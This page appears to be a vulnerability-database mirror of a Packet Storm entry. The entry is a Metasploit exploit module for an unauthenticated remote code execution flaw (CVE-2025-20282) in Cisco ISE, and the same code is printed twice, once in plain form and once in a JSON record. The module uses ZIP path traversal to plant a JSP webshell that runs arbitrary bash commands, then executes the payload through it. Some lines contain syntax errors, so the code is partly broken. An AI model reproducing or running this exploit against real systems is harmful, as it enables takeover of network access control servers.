📄 Cisco ISE 2.2 Remote Code Execution_PACKETSTORM:220737

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

This Metasploit module exploits an unauthorized file upload vulnerability in Cisco ISE. A ZIP file containing a JSP file with a manipulated path path traversal is uploaded. The webshell is then extracted to the webapps folder...

Visit Original Source

Basic Information

ID PACKETSTORM:220737

Published May 11, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Cisco ISE 2.2 Unauthenticated RCE Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.cisco.com/ |
==================================================================================================================================

[+] Summary : an RCE vulnerability in Cisco Identity Services Engine (ISE), identified as CVE-2025-20282. The flaw is related to insecure file upload handling combined with ZIP path traversal.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco ISE Unauthenticated RCE (CVE-2025-20282)',
'Description' => %q{
This mod exploits an unauthorized file upload vulnerability in Cisco ISE.
A ZIP file containing a JSP file with a manipulated path (Path Traversal) is uploaded.
The webshell is then extracted to the Webapps folder.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' => [ ['CVE', '2025-20282'] ],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'Targets' => [ ['Cisco ISE', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-01',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
]
)
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z')
})

return CheckCode::Unknown unless res
return CheckCode::Appears if res.code == 405

CheckCode::Safe
end

def exploit
shell_name = "#{Rex::Text.rand_text_alpha(8)}.jsp"
traversal_path = "appsrv/apache-tomcat/webapps/admin/error/#{shell_name}"

print_status("Creating a ZIP file with path manipulation...")

zip_data = Rex::Zip::Archive.new
zip_data.add_file(traversal_path, jsp_payload)

print_status("Uploading Webshell: #{shell_name}")")

post_data = Rex::MIME::Message.new
post_data.add_part(
zip_data.pack,
'application/zip',
'binary',
"form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.zip\""
)

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Upload failed (Response code: #{res&.code})")")
end

register_files_for_cleanup("appsrv/apache-tomcat/webapps/admin/error/#{shell_name}")

print_status("Command being executed via Webshell...")

cmd = Rex::Text.uri_encode(payload.encoded)
execute_command(shell_name, cmd)
end

def execute_command(shell_name, cmd)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'error', shell_name),
'vars_get' => { 'cmd' => cmd }
}, 5)
end

def jsp_payload
<<~JSP
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
InputStream in = p.getInputStream();
int c;
while ((c = in.read()) != -1) out.print((char)c);
}
%>
JSP
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-05-11T17:18:12",
    "description": "This Metasploit module exploits an unauthorized file upload vulnerability in Cisco ISE. A ZIP file containing a JSP file with a manipulated path path traversal is uploaded. The webshell is then extracted to the webapps folder...",
    "published": "2026-05-11T00:00:00",
    "modified": "2026-05-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Cisco ISE 2.2 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220737",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-20282"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Cisco ISE 2.2 Unauthenticated RCE Metasploit Module                                                              |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.cisco.com/                                                                                           |\n    ==================================================================================================================================\n    \n    [+] Summary    : an RCE vulnerability in Cisco Identity Services Engine (ISE), identified as CVE-2025-20282. The flaw is related to insecure file upload handling combined with ZIP path traversal.\n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      prepend Msf::Exploit::Remote::AutoCheck\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::FileDropper\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name'           => 'Cisco ISE Unauthenticated RCE (CVE-2025-20282)',\n            'Description'    => %q{\n              This mod exploits an unauthorized file upload vulnerability in Cisco ISE.\n    A ZIP file containing a JSP file with a manipulated path (Path Traversal) is uploaded.\n    The webshell is then extracted to the Webapps folder.\n            },\n            'Author'         => [ 'indoushka' ],\n            'License'        => MSF_LICENSE,\n            'References'     => [ ['CVE', '2025-20282'] ],\n            'Platform'       => 'linux',\n            'Arch'           => ARCH_CMD,\n            'Targets'        => [ ['Cisco ISE', {}] ],\n            'DefaultTarget'  => 0,\n            'DisclosureDate' => '2025-01-01',\n            'Notes'          => {\n              'Stability'   => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            Opt::RPORT(443),\n            OptBool.new('SSL', [true, 'Use SSL', true]),\n            OptString.new('TARGETURI', [true, 'The base path', '/'])\n          ]\n        )\n      end\n    \n      def check\n        res = send_request_cgi({\n          'method' => 'GET',\n          'uri'    => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z')\n        })\n    \n        return CheckCode::Unknown unless res\n        return CheckCode::Appears if res.code == 405\n    \n        CheckCode::Safe\n      end\n    \n      def exploit\n        shell_name = \"#{Rex::Text.rand_text_alpha(8)}.jsp\"\n        traversal_path = \"appsrv/apache-tomcat/webapps/admin/error/#{shell_name}\"\n    \n    print_status(\"Creating a ZIP file with path manipulation...\")\n    \n        zip_data = Rex::Zip::Archive.new\n        zip_data.add_file(traversal_path, jsp_payload)\n    \n       print_status(\"Uploading Webshell: #{shell_name}\")\")\n    \n        post_data = Rex::MIME::Message.new\n        post_data.add_part(\n          zip_data.pack,\n          'application/zip',\n          'binary',\n          \"form-data; name=\\\"file\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(5)}.zip\\\"\"\n        )\n    \n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri'    => normalize_uri(target_uri.path, 'admin', 'files-upload', 'z'),\n          'ctype'  => \"multipart/form-data; boundary=#{post_data.bound}\",\n          'data'   => post_data.to_s\n        })\n    \n        unless res && res.code == 200\n    fail_with(Failure::UnexpectedReply, \"Upload failed (Response code: #{res&.code})\")\")\n        end\n    \n        register_files_for_cleanup(\"appsrv/apache-tomcat/webapps/admin/error/#{shell_name}\")\n    \n    print_status(\"Command being executed via Webshell...\")\n    \n        cmd = Rex::Text.uri_encode(payload.encoded)\n        execute_command(shell_name, cmd)\n      end\n    \n      def execute_command(shell_name, cmd)\n        send_request_cgi({\n          'method' => 'GET',\n          'uri'    => normalize_uri(target_uri.path, 'admin', 'error', shell_name),\n          'vars_get' => { 'cmd' => cmd }\n        }, 5)\n      end\n    \n      def jsp_payload\n        <<~JSP\n          <%@ page import=\"java.io.*\" %>\n          <%\n          String cmd = request.getParameter(\"cmd\");\n          if (cmd != null) {\n              Process p = Runtime.getRuntime().exec(new String[]{\"/bin/bash\", \"-c\", cmd});\n              InputStream in = p.getInputStream();\n              int c;\n              while ((c = in.read()) != -1) out.print((char)c);\n          }\n          %>\n        JSP\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/220737",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220737/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply